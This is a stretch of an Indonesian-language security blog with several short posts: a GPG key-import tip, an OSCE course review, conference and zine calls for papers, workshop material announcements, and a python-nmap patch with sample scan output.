<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0RlVkfYLT8lWlj3H2THOfnXFGBjE6mLxSFZpJH2phMPHwrv2ewT0ZU2-HFDC0mXzUY76Y6hkqEkpZvAEB8aSfMG263_gnjf3SMeQXmWkVg37yjUaikkW4iJvHN8ZTqHfszDAi/s1600/2013-05-24+02.51.52+pm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="115" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0RlVkfYLT8lWlj3H2THOfnXFGBjE6mLxSFZpJH2phMPHwrv2ewT0ZU2-HFDC0mXzUY76Y6hkqEkpZvAEB8aSfMG263_gnjf3SMeQXmWkVg37yjUaikkW4iJvHN8ZTqHfszDAi/s320/2013-05-24+02.51.52+pm.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
So, i decided to import it using the command line using the gpg --import key, then, i think i know what is the problems. Yes, the self-signature uid issue warning.<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVvfngU2qrmSZ9NKfHH1HAliN37bEh8eQuTyihWEQk3WT9WpOJvH7iLfQ1wbQgNh64e24o8vZAlx_wVdmDcABty4ChipmDZZ1ZsD4-qz2P-WTqmy2xVrSmPKVNmoUu_qtz2sZa/s1600/2013-05-24+02.50.05+pm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="102" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVvfngU2qrmSZ9NKfHH1HAliN37bEh8eQuTyihWEQk3WT9WpOJvH7iLfQ1wbQgNh64e24o8vZAlx_wVdmDcABty4ChipmDZZ1ZsD4-qz2P-WTqmy2xVrSmPKVNmoUu_qtz2sZa/s400/2013-05-24+02.50.05+pm.png" width="400" /></a></div>
To <strike>fix </strike> deal with the issue, we can allow non-selfsigned uid, by adding it to the gpg.conf<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbh9nWICxE7m6T1ymxTz9d_qqQj0b9KlhiCmSxS62GTTUA8mM57Nz0m2FlO8lHxGdvJFreKsFMfc0CKYos4BiiVJLD9B1gpSmdzjEBK_NLYcWppNrCs5AaDdqwuvLwCvnljEWa/s1600/2013-05-24+02.51.00+pm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbh9nWICxE7m6T1ymxTz9d_qqQj0b9KlhiCmSxS62GTTUA8mM57Nz0m2FlO8lHxGdvJFreKsFMfc0CKYos4BiiVJLD9B1gpSmdzjEBK_NLYcWppNrCs5AaDdqwuvLwCvnljEWa/s400/2013-05-24+02.51.00+pm.png" width="400" /></a></div>
<br />
And then, try to import the key again using gpg<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUhXlGAq4Bzfaje7CGV8KZb6qH7t0P393PbocXpZq1e_peq-H6YF1AZFb_nChOhI87OoXByUCm5rpgdfrbdFjOlGK1oBMsxqOoNoVk7E8y8vuZUf1e8cvJRR6_IX62gEFbQuYu/s1600/2013-05-24+02.51.23+pm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="90" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUhXlGAq4Bzfaje7CGV8KZb6qH7t0P393PbocXpZq1e_peq-H6YF1AZFb_nChOhI87OoXByUCm5rpgdfrbdFjOlGK1oBMsxqOoNoVk7E8y8vuZUf1e8cvJRR6_IX62gEFbQuYu/s400/2013-05-24+02.51.23+pm.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
or using GPG Keychain Access application</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe_qm42H80EmFBuCtXYfcVdZrEm5ZIi6dHRMjDAe-vioKdq_SCbkEvurS0pM_0xStCDUH76KlwIVje6rz0M-aZAn9xbVdpiguB37wz3nV10HDyeUxXyYDNpkdRoMLVoIY-zh6E/s1600/2013-05-24+03.26.30+pm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="101" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe_qm42H80EmFBuCtXYfcVdZrEm5ZIi6dHRMjDAe-vioKdq_SCbkEvurS0pM_0xStCDUH76KlwIVje6rz0M-aZAn9xbVdpiguB37wz3nV10HDyeUxXyYDNpkdRoMLVoIY-zh6E/s400/2013-05-24+03.26.30+pm.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
And, now we've got the key imported.</div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwEsSux5rJwCqOE3TB5AdeMJEEngAMfAXa7uYu-jouB8futBrsoTFlKx7UVShjGprG2owzDWOkpcMQ7TWiiUgZW7dElJKzRLvvpY-p2XBuu_nSd1Jw5mNC_5oSWdA7OZQtxyP6/s1600/2013-05-24+02.52.39+pm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwEsSux5rJwCqOE3TB5AdeMJEEngAMfAXa7uYu-jouB8futBrsoTFlKx7UVShjGprG2owzDWOkpcMQ7TWiiUgZW7dElJKzRLvvpY-p2XBuu_nSd1Jw5mNC_5oSWdA7OZQtxyP6/s320/2013-05-24+02.52.39+pm.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Hope it helps.</div>
<span class="fullpost"></span>y3dipshttp://www.blogger.com/profile/17213969345889442559noreply@blogger.com0tag:blogger.com,1999:blog-8300373.post-60187533980875354532013-04-29T13:44:00.002+07:002013-04-29T14:18:42.364+07:00Review singkat sertifikasi OSCE<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjErUElSuFincHXV5LOHjIvxQA7eLoij65hEOYqErBoynqvlmCjbVJYwtt4VNtkLbeDA3h2lleCDjzv8ek2hNopBCokR-6hEZfKAD3Ig3a_9v8hJbMxHD-Z9bMEzDOfqpkzueg-/s1600/cert-logo-osce.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjErUElSuFincHXV5LOHjIvxQA7eLoij65hEOYqErBoynqvlmCjbVJYwtt4VNtkLbeDA3h2lleCDjzv8ek2hNopBCokR-6hEZfKAD3Ig3a_9v8hJbMxHD-Z9bMEzDOfqpkzueg-/s1600/cert-logo-osce.png" /></a></div>
Sudah sejak satu bulan (lebih) yang lalu gw memutuskan untuk mengambil satu lagi kursus dari <a href="http://www.offensive-security.com/" target="_blank">offsec</a>, yaitu kursus <a href="http://www.offensive-security.com/information-security-certifications/osce-offensive-security-certified-expert/" target="_blank">Offensive Security Certified Expert (OSCE)</a> dan baru pagi ini mendapatkan info kalo gw lulus. Tujuan gw ikut kursus sebenarnya bukan untuk menyiksa diri :P, mengingat pengalaman terakhir gw saat <a href="http://clog.ammar.web.id/2012/03/short-story-about-offsec-training-oscp.html" target="_blank">ber-OSCP</a> dan karena tipe2 kursus dan ujian yang umum didapatkan dari offsec, tetapi lebih dikarenakan "<i>curiosity</i>" ;).<br />
<br />
Karena sudah banyak sekali review mengenai seberapa menantang dan menariknya kursus "<i>Cracking The Perimeter </i>(CTP)" dan ujian <a href="https://www.google.com/search?q=offensive+security+certified+expert+review" target="_blank">OSCE</a> ini :), maka kali ini gw coba review dalam bahasa Indonesia (karena yang berbahasa Inggris sudah banyak), walau tetap tidak akan bisa menginfokan hal-hal terkait materi kursus dan ujiannya :).<br />
<br />
Seperti yang tertera di<a href="http://www.offensive-security.com/information-security-training/cracking-the-perimeter/" target="_blank">web</a>-nya serta terdapat pada <a href="http://www.offensive-security.com/documentation/cracking-the-perimiter-syllabus.pdf" target="_blank">silabus</a>nya, pada kursus ini hampir 3/4 dari materinya adalah mengenai <i>windows exploitation</i>, mulai dari menemukan celah dan (teknik) melakukan <i>fuzzing</i>, merakit payload+shellcode (manual, dengan <i>encoder</i>), sampai membuat '<i>working</i>' exploit, sisanya adalah mengenai antivirus evasion, advanced web application hacking, serta sedikit network hacking.<br />
<br />
<a name='more'></a>Khusus untuk gw pribadi yang sebelumnya lebih banyak berkecimpung pada ekploitasi di ranah web, network, dan jikapun OS dan aplikasi itu di ranah GNU/Linux, maka kursus ini agak sedikit banyak membuka mata gw dan bermanfaat sekali dalam jumlah ilmu yang gw dapat, walau pada kursus OSCP sudah terdapat porsi mengenai <i>windows exploitation </i>juga, tetapi kali ini setiap hari (selama 1 bulan) yang sudah pasti gw sentuh hanya windows OS (xp,2003,vista, windows7), debugger (Ollydbg/ImmunityDebugger), <i>hexa editor</i> (hexedit/xv123), dan <i>calculator</i> :P.<br />
<br />
Untuk kursus ini gw mengambil paket kursus 30 hari+ujian dan ternyata berbeda dengan OSCP yang memerlukan penggunaan lab yang lebih maksimal, maka untuk OSCE, penggunaan lab yang gw lakukan sangat tidak maksimal, gw cuma beberapa hari saja mempergunakan lab, dan itupun untuk melakukan debug/exploitasi ke beberapa aplikasi yang <i>propietary</i> dan untuk modul cisco/network exploitation karena gw tidak punya perangkat cisco :D, selebihnya gw membangun lab sendiri dengan virtualisasi.<br />
<br />
Untuk ujian sertifikasi, waktu yang di sediakan adalah 2x24 jam, dan 1x24 jam untuk mengumpulkan laporan. Gw memberi jarak 2 minggu setelah kursus selesai, baru kemudian mengambil ujian yang diberikan, dan seperti tipikal ujian yang diberikan oleh offsec di setiap sertifikasinya (setidaknya untuk oscp yang pernah gw lewati), maka ujian ini adalah menjadi/memberi pelajaran baru (jika memahami maksud gw) :D. Untuk pengumuman lulus atau tidak diinfokan maksimal 3 hari kerja, tetapi untuk kasus gw itu hampir 1 minggu, karena sabtu&minggu libur dan adanya perbedaan waktu, jadi cukup menyiksa juga saat menunggu :P<br />
<br />
Kursus ini sangat gw rekomendasikan, bukan karena gw dibayar sama offsec buat mengatakan begitu :P, tetapi karena kursus ini (seperti juga oscp) mengajarkan sesuatu hal yang baru khususnya saat ujian dan kita dipaksa untuk meningkatkan secara pesat "kungfu" kita jika ingin lulus ujian. Tetapi gw sarankan untuk mencoba OSCP terlebih dahulu sebelum mencoba OSCE jika berminat, setelah mencoba oscp dan anda sudah merasakan sedikit bersinggungan dengan <i>windows exploitation</i> maka kalikan rasa suka/beban yang anda terima saat belajar chapter itu dengan 10x (atau lebih?) dan itu yang akan anda dapatkan saat kursus apalagi ujian OSCE (setidaknya itu yang gw rasakan).<br />
<br />
Satu lagi, jika pada OSCP anda dihadapkan dengan celah keamanan atau teknik intrusi yang sudah terpublikasikan (ada <i>public exploit</i> dan CVE) secara luas, maka di OSCE anda tidak akan mendapat info mengenai celah keamanan (<i>0day </i>perspektif) dan yang bisa anda lakukan adalah "Try Harder" :).<br />
<br />
Bagi yang mau mengambil, gw ucapkan Good Luck ;)y3dipshttp://www.blogger.com/profile/17213969345889442559noreply@blogger.com6tag:blogger.com,1999:blog-8300373.post-68891209307140200022013-03-26T10:05:00.001+07:002013-03-26T10:40:05.044+07:00IDSECCONF 2013 Call For PaperSebenarnya CFP untuk idsecconf 2013 sudah di publish kurang lebih 2 minggu yang lalu di situs <a href="http://2013.idsecconf.org/2013/03/idsecconf-2013-surabaya-call-for-paper.html" target="_blank">IDSECCONF</a> sendiri dan di situs <a href="http://wiz.echo.or.id/2013/03/cfp-idsecconf-2013-unair-surabay.html" target="_blank">echo</a>, serta situs-situs lainnya. Jika yang belum mengetahuinya dan hanya jika anda kebetulan memperoleh informasi cuma dari blog ini :D (*ga mungkin), maka saya ingin menginfokan bahwa untuk kegiatan tahunan IDSECCONF yang ke-6 ini di UNAIR Surabaya, maka telah di rilis <i>call-for-paper</i>-nya.<span class="fullpost"></span><br />
<div>
<br /></div>
<div>
Tema kegiatan tahun ini adalah merupakan gabungan dari 3 buah tema, yaitu <b>Digital Forensic, Digital signatures dan Cybercrime Detection</b>, jadi bagi anda yang merasa memiliki keahlian dibidang tersebut, atau memiliki rasa keingintahuan yang tinggi di bidang-bidang tersebut, tidak ada salahnya dan diharapkan sekali oleh kami bagi anda untuk mengirimkan paper anda agar dapat diikut sertakan dan diseleksi terlebih dahulu untuk dapat di-<i>share </i>dan disampaikan pada 15,16 Juni 2013 di Surabaya.</div>
<div>
<br />
<a name='more'></a>Bagi anda yang memiliki keahlian dan rasa ingin tahu di topik lain seputar IT Security, anda tetap dapat mengirimkan paper anda, tetapi komposisi dan kemungkinan terpilih akan lebih sedikit dibanding yang sesuai tema. Sebagai ilustrasi adalah jika ada 5 paper diluar tema, maka kemungkinan hanya 1 yang akan di ambil, sedangkan 5 paper sesuai tema akan masuk semua apabila memenuhi syarat kualitas, originalitas, dsb.</div>
<div>
<br /></div>
<div>
Bagi anda yang terpilih papernya, maka anda akan di biayai perjalanan pulang-pergi dengan pesawat selama anda berdomisili di wilayah Republik Indonesia, difasilitasi hotel/penginapan serta *uang saku (dalam konfirmasi), tidak hanya sampai disitu, keuntungan bagi anda yang merupakan penduduk kota jakarta, kemungkinan besar perjalanan anda akan di hibur/ganggu oleh hebohnya para komite apabila berangkat di waktu dan maskapai yang sama :D</div>
<div>
<br /></div>
<div>
Ok, kami tunggu paper anda sampai 15 Mei 2013 di email submit[at]idsecconf.org, info lebih lengkap dapat dibaca di <a href="http://2013.idsecconf.org/2013/03/idsecconf-2013-surabaya-call-for-paper.html">http://2013.idsecconf.org/2013/03/idsecconf-2013-surabaya-call-for-paper.html</a>, info dsb bisa email ke info[at]idsecconf.org, atau mention akun di twitter <a href="http://twitter.com/idsecconf" target="_blank">@idsecconf</a>.</div>
<div>
<br /></div>
<div>
<br /></div>
y3dipshttp://www.blogger.com/profile/17213969345889442559noreply@blogger.com3tag:blogger.com,1999:blog-8300373.post-76193306103066781572013-01-31T20:44:00.002+07:002013-06-01T00:20:05.378+07:00[Book] Web Hacking Basic<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNpue2wOJp71Yv6FCaP-bet4olQ0ceV8Pm2Ax79LvqUvsZ9BtI5RQSYyTa3j9nQJKUUgxDVjEyBbiw2TD3TCa6VBKZTmvTuE-v7MMESjd_0v1ZCBeSPcSYInxifcpyIDCuC3cI/s1600/2013-01-31+08.43.09+pm.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNpue2wOJp71Yv6FCaP-bet4olQ0ceV8Pm2Ax79LvqUvsZ9BtI5RQSYyTa3j9nQJKUUgxDVjEyBbiw2TD3TCa6VBKZTmvTuE-v7MMESjd_0v1ZCBeSPcSYInxifcpyIDCuC3cI/s320/2013-01-31+08.43.09+pm.png" width="241" /></a></div>
Berikut ini adalah materi yang gw pergunakan saat melakukan workshop/pelatihan web hacking. Ini adalah versi terakhir dari workshop terakhir yang gw lakukan, dan ini adalah materi basic-nya. Dikarenakan sudah gw format seperti buku jadi mungkin bisa disebut buku :).<br />
<br />
Materi Basic ini meliputi:<br />
<br />
1. Perkenalan Web Attack Vector (berbasis OWASP) dan untuk materi basic ini hanya XSS dan SQL injection yang di bahas menggunakan Aplikasi yang gw kembangkan sendiri.<br />
<br />
2. DVWA (Damn Vulnerable Web Application) Walkthrough, berisi bagaimana mengeksploitasi 9 celah keamanan yang terdapat di aplikasi <a href="http://dvwa.co.uk/" target="_blank">DVWA</a>.<br />
<a name='more'></a><br />
3. Perkenalan Web application security tools, yang pada level basic hanya diperkenalkan penggunaan Nikto dan Nmap, sedangkan lanjutan mempergunakan BurpSuite (Pro), SQLMap, dll.<br />
<br />
[update 2nd edition]<br />
- Minor fix dan Typo<br />
<br />
[update 3rd edition]<br />
- Penambahan Chapter 4. Burp suite Usage, membahas mengenai 9 buah tools yang terdapat pada Burp disertai penjelasan dan contoh penggunaan<br />
<br />
Dan untuk Buku lengkapnya dapat dibaca dan didownload <a href="http://www.slideshare.net/y3dips/web-hackingdvwapublish" target="_blank">disini</a> atau <a href="https://www.dropbox.com/s/k0l37cgnv2uwh3u/web-hacking-dvwa-publishv3.pdf" target="_blank">disini</a>. Semoga bermanfaat, Enjoy!<br />
<br />y3dipshttp://www.blogger.com/profile/17213969345889442559noreply@blogger.com4tag:blogger.com,1999:blog-8300373.post-91047955494228669662013-01-28T14:43:00.000+07:002013-01-29T14:40:52.479+07:00ECHO Gathering - Hack In The Zoo (HITZ) 2013#1Dear ECHO-ers,<br />
<br />
Tahun telah berganti, tak terasa kita sudah memasuki tahun 2013, ECHO bakal ngadain lagi acara HITZ (Hack In The Zoo) 2013-#1 yang kali ini akan di adakan di Kebun Raya Bogor, Jawa Barat.<br />
<br />
Tema nya kali ini adalah "<b><i>Underground Community</i></b> - Resolusi 2013"<br />
<br />
Seperti biasa, sharing knowledge tidak hanya akan didominasi oleh para ECHO|Staff, tetapi juga partisipasi dari member group dan forum ECHO.<br />
<br />
Nah berikut ini list para pembicara beserta materinya :<br />
<a name='more'></a><br />
1. y3dips, Topic: TBA<br />
2. Hero Suhartono, Topic: Build a minipwner box base on openWRT<br />
3. Arif Wicaksono (RNDC), Topic: "social media, ultimate tools for social engineering"<br />
4. Ahmad Maulada, Topic: TBA<br />
5. Josescalia, Topic: TBA<br />
<br />
Tanggal dan waktu pelaksanaannya :<br />
Sabtu, 16 Februari 2013 Pukul 10.00 WIB - 14.00 WIB.<br />
Tempat : Kebun Raya Bogor<br />
Meeting Point : Halaman Depan Pusat Informasi di dalam Kebun Raya Bogor<br />
<br />
Acara ini <b>free </b>(gratis), tiket masuk ke kebon raya bayar sendiri-sendiri. Untuk CP nya alias yang bisa dikontak via twitter kalau tersesat: <a href="http://twitter.com/@echordc" target="_blank">@echordc</a> <a href="http://twitter.com/@y3dips" target="_blank">@y3dips</a> <a href="http://twitter.com/@azisaz" target="_blank">@azisaz</a> <a href="http://twitter.com/@159k" target="_blank">@159k</a><br />
<br />
Sampe ketemu di Bogor ;)<br />
Link event di Facebook : <a href="https://www.facebook.com/events/300540010049483/">https://www.facebook.com/events/300540010049483/</a><br />
<br />y3dipshttp://www.blogger.com/profile/17213969345889442559noreply@blogger.com0tag:blogger.com,1999:blog-8300373.post-82945604887400561282013-01-23T11:35:00.003+07:002013-01-26T13:29:43.185+07:00[Presentation File] Network Packet AnalysisBerikut ini adalah file presentasi hari kedua untuk kegiatan workshop (hands-on) terkait Network Paket Analysis, yang dihari kedua ini membahas penggunaan fitur-fitur analisa yang dimiliki oleh wireshark, kemudian melakukan studi kasus untuk analisa dan rekonstruksi terhadap 3 buah file hasil <i>network capture</i>, kemudian pengenalan terhadap <i>tools </i>untuk melakukan packet analysis lainnya yaitu: Xplico (unix base) dan Network Miner (windows base).<br />
<br />
Dan terakhir adalah membuat Wireshark dissector untuk custom/propietary protocols dengan bahasa pemrograman LUA dengan memanfaatkan Wireshark LUA API.<br />
<br />
Dan berikut ini adalah file presentasinya, dan untuk file presentasi pertama yaitu <i>basic network packet analysis</i> bisa dilihat di <a href="http://clog.ammar.web.id/2013/01/presentation-file-basic-network-packet.html" target="_blank">sini</a>. Mudah-mudahan bermanfaat.<br />
<br />
<a name='more'></a><br />
<iframe allowfullscreen="" frameborder="0" height="356" marginheight="0" marginwidth="0" mozallowfullscreen="" scrolling="no" src="http://www.slideshare.net/slideshow/embed_code/16128576" style="border-width: 1px 1px 0; border: 1px solid #CCC; margin-bottom: 5px;" webkitallowfullscreen="" width="427"> </iframe> <br />
<br />
<div style="margin-bottom: 5px;">
<strong>Untuk Melihat dan Mendownloadnya via Slideshare di sini <a href="http://www.slideshare.net/y3dips/network-packet-analysis" target="_blank" title="Network Packet Analysis">Network Packet Analysis</a>.</strong><br />
<strong>Enjoy!</strong></div>
<br />y3dipshttp://www.blogger.com/profile/17213969345889442559noreply@blogger.com0tag:blogger.com,1999:blog-8300373.post-14107124237690395842013-01-23T08:07:00.000+07:002013-01-26T13:32:04.512+07:00echo|zine, Vol 11 Issue 27 Call For Paper<span style="font-size: x-small;"></span><br />
<pre><span style="font-size: x-small;">* /CALL /FOR /PAPERS * /CALL /FOR /PAPERS * /CALL /FOR /PAPERS *
* /CALL /FOR /PAPERS * /CALL /FOR /PAPERS * /CALL /FOR /PAPERS *
Hail Hackers !!!!
Kami, echo|staff, yang sedang mempersiapkan echo|zine, Vol 11 Issue 27
mengajak Anda semua untuk dapat berpartisipasi dengan mengirimkan
artikel seputar:
* hacking
* security
* phreaking
* forensics
* carding
* telco
* electronics
* cryptography
* coding
* local underground news
<a name='more'></a>
Panduan menulis artikel dapat dibaca kembali pada echo|zine, Vol 3
Issue 11 [http://ezine.echo.or.id/ezine11/echo11-003.txt]
Para kontributor dihimbau untuk mengirimkan artikel sedini mungkin
untuk menghindari konflik pemilihan topik dan memudahkan editor
memandu dan mengoreksi artikel. Selain itu, artikel yang dikirimkan
diharapkan bukan merupakan artikel terjemahan/saduran dan belum pernah
dimuat di media lain.
Kami juga menerima usulan interview untuk komunitas, lengkapnya silahkan
baca di http://ezine.echo.or.id/interview-komunitas.txt
Usulan artikel harus dikirimkan ke ezine@echo.or.id
================
Important dates:
* submission deadline ......................... 18 Februari 2013
* author release .............................. 25 Februari 2013
* public release .............................. 01 Maret 2013
Salam,
echo|zine editor-in-chief</span></pre>
<span class="fullpost"></span>y3dipshttp://www.blogger.com/profile/17213969345889442559noreply@blogger.com0tag:blogger.com,1999:blog-8300373.post-20827124187153019442013-01-22T20:56:00.000+07:002013-01-26T13:30:19.425+07:00[Presentation File] Basic Network Packet AnalysisKira-kira beberapa bulan yang lalu (tahun lalu) gw sempat mengajar dan menjadi narasumber selama 2 hari untuk kegiatan workshop <i>(hands-on</i>)<i> </i>terkait <i>Network Paket Analysis</i>, yang dihari pertama yang masih <i>Basic </i>dan membahas mengenai <i>Packet Analysis</i>, optimasi penggunaan wireshark untuk keperluan <i>network packet analysis</i>, serta terakhir adalah melakukan <i>packet analysis</i> dan <i>reconstruction</i>.<br />
<br />
Dan berikut ini adalah file presentasinya, siapa tau bermanfaat.<br />
<br />
<a name='more'></a><br /><br />
<span class="fullpost"></span> <iframe allowfullscreen="" frameborder="0" height="356" marginheight="0" marginwidth="0" mozallowfullscreen="" scrolling="no" src="http://www.slideshare.net/slideshow/embed_code/16116948" style="border: 1px solid rgb(204, 204, 204); margin-bottom: 5px;" webkitallowfullscreen="" width="427"></iframe><br />
<div style="margin-bottom: 5px;">
<strong>Download dan lihat di Slideshare <a href="http://www.slideshare.net/y3dips/packet-analysis" target="_blank" title="Packet analysis (Basic)">Packet analysis (Basic)</a> </strong><br />
<strong><br /></strong>
Untuk materi lanjutannya akan gw upload dan update kembali. Enjoy!</div>
y3dipshttp://www.blogger.com/profile/17213969345889442559noreply@blogger.com0tag:blogger.com,1999:blog-8300373.post-74483520360266314022012-12-17T22:51:00.004+07:002012-12-17T22:51:48.593+07:00[Late Post] EchoZine Issue26 Public ReleaseSudah lama tidak mengupdate blog ini dengan post sesungguhnya, dan kali inipun tetap bukan post sesungguhnya, karena cuma ingin mengabarkan bahwa issue26 ezine telah di rilis 5 hari yang lalu, dan juga gw menulis di blog ini hanya karena post sebelumnya menulis tentang call-for-paper issue26, jadi seperti tidak enak jika telah dibuka dan tidak ditutup.<div>
<br /></div>
<div>
Oke, cukup basa-basinya, bagi yang belum tau jika echo telah merilis issue terakhirnya di 121212, silahkan menuju ke <a href="http://ezine.echo.or.id/">http://ezine.echo.or.id</a> atau ke <a href="http://mirror.echo.or.id/">http://mirror.echo.or.id</a>.</div>
<div>
<br /></div>
<div>
Enjoy!</div>
y3dipshttp://www.blogger.com/profile/17213969345889442559noreply@blogger.com0tag:blogger.com,1999:blog-8300373.post-59052485134409579582012-10-03T08:57:00.000+07:002013-01-26T13:32:35.265+07:00echo|zine, Vol 10 Issue 26 Call For Paper<span style="font-size: x-small;"></span><br />
<pre><span style="font-size: x-small;">echo|zine, Vol 10 Issue 26
* /CALL /FOR /PAPERS * /CALL /FOR /PAPERS * /CALL /FOR /PAPERS *
* /CALL /FOR /PAPERS * /CALL /FOR /PAPERS * /CALL /FOR /PAPERS *
Hail Hackers !!!!
Kami, echo|staff, yang sedang mempersiapkan echo|zine, Vol 10 Issue 26
mengajak Anda semua untuk dapat berpartisipasi dengan mengirimkan
artikel seputar:
* hacking
* security
* phreaking
* forensics
* carding
* telco
* electronics
* cryptography
* coding
* local underground news
<a name='more'></a>
Panduan menulis artikel dapat dibaca kembali pada echo|zine, Vol 3
Issue 11 [http://ezine.echo.or.id/ezine11/echo11-003.txt]
Para kontributor dihimbau untuk mengirimkan artikel sedini mungkin
untuk menghindari konflik pemilihan topik dan memudahkan editor
memandu dan mengoreksi artikel. Selain itu, artikel yang dikirimkan
diharapkan bukan merupakan artikel terjemahan/saduran dan belum pernah
dimuat di media lain.
Kami juga menerima usulan interview untuk komunitas, lengkapnya silahkan
baca di http://ezine.echo.or.id/interview-komunitas.txt
Usulan artikel harus dikirimkan ke ezine@echo.or.id
================
Important dates:
* submission deadline ......................... 01 Desember 2012
* author release .............................. 08 Desember 2012
* public release .............................. 12 Desember 2012
Salam,
echo|zine editor-in-chief</span></pre>
<span class="fullpost"></span>y3dipshttp://www.blogger.com/profile/17213969345889442559noreply@blogger.com0tag:blogger.com,1999:blog-8300373.post-79669874461010810852012-08-31T21:53:00.000+07:002012-08-31T21:56:11.856+07:00Python-nmap 0.2.4 patch fixing NSE support and support version and product outputAfter using <a href="http://xael.org/norman/python/python-nmap/" target="_blank">python-nmap</a> version 0.2.4, the previous <a href="http://clog.ammar.web.id/2012/01/python-nmap-patch-supporting-product.html" target="_blank">patch</a> that i've created before for python-nmap didnt work. So, i decide to take a peek, and now come with <a href="http://pastie.org/4636786" target="_blank">new patch</a> :). I also fix the "NSE output" support.<br />
<br />
Oh Well, here are the result with NSE:<br />
<br />
<pre class="brush: python">>>> import nmap
>>> nm=nmap.PortScanner()
>>> nm.scan('192.168.1.212', '445', arguments='--script=/usr/local/share/nmap/scripts/smb-os-discovery.nse')
{'nmap': {'scanstats': {'uphosts': u'1', 'timestr': u'Fri Aug 31 21:33:19 2012', 'downhosts': u'0', 'totalhosts': u'1', 'elapsed': u'0.28'}, 'scaninfo': {u'tcp': {'services': u'445', 'method': u'syn'}}, 'command_line': u'nmap -oX - -p 445 --script=/usr/local/share/nmap/
scripts/smb-os-discovery.nse 192.168.1.212'}, 'scan': {u'192.168.1.212': {'status': {'state': u'up', 'reason': u'arp-response'}, 'hostname': u'BookLife', u'tcp': {445: {'product':
None, 'state': u'open', 'version': None, 'reason': u'syn-ack', 'name': u'microsoft-ds'}},'script': {u'smb-os-discovery': u'\n OS: Unix (Samba 3.2.5)\n Computer name: localhost\n Domain name: localdomain\n FQDN: localhost.localdomain\n NetBIOS computer name: \n System time: 2012-07-19 09:27:12 UTC+7\n'}}}}
>>>
</pre>
<div>
<br /></div>
<div>
Enjoy ;)</div>
y3dipshttp://www.blogger.com/profile/17213969345889442559noreply@blogger.com0tag:blogger.com,1999:blog-8300373.post-27860285927775306622012-06-15T09:59:00.000+07:002012-06-15T09:59:09.770+07:00Kegiatan #idsecconf2012 Write Up Day 2<div>
Kegiatan hari kedua dimulai kembali dengan sebuah materi yang dibawakan oleh Hero ShvRootkit dan berjudul "Pwned IP Camera for phun: POC (0day) exploit for EDIMAX IC-3030iWn", pada materi kali ini Hero menyinggung mengenai kerentanan <i>embedded device </i>yang umumnya tidak menjadi perhatian baik pemilik maupun penyerang, umumnya kita memprioritaskan keamanan ataupun serangan kesebuah server, dan jarang sekali yang juga memprioritaskan kemanan perangkat router, WIFI akses point, mesin printer, fax, perangkat cctv dan termasuk didalamnya adalah kamera berbasis IP (<i>ipcam</i>). </div>
<div>
<br /></div>
<div>
Pada kesempatan kali ini pula Hero membahas celah keamanan dan jenis serangan terhadap ipcam secara umum serta mengkhususkan membahas celah keamanan serta mendemokan 0day <a href="http://packetstormsecurity.org/files/113553/Edimax-IC-3030iWn-Authentication-Bypass.html" target="_blank">exploit</a> pada firmware (opensource) milik salah satu versi dari EDIMAX yang digunakan oleh berbagai jenis ipcam lainnya. Kemudian materi dilanjutkan dengan pembahasan mengenai "Design of Indonesia Malware Attack Monitoring Center" oleh Bpk. Charles Lim. Beliau menjelaskan mengenai Indonesia Malware Attack Monitoring center yang telah di bangun dan implementasikan pada sebuah kampus di Indonesia.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
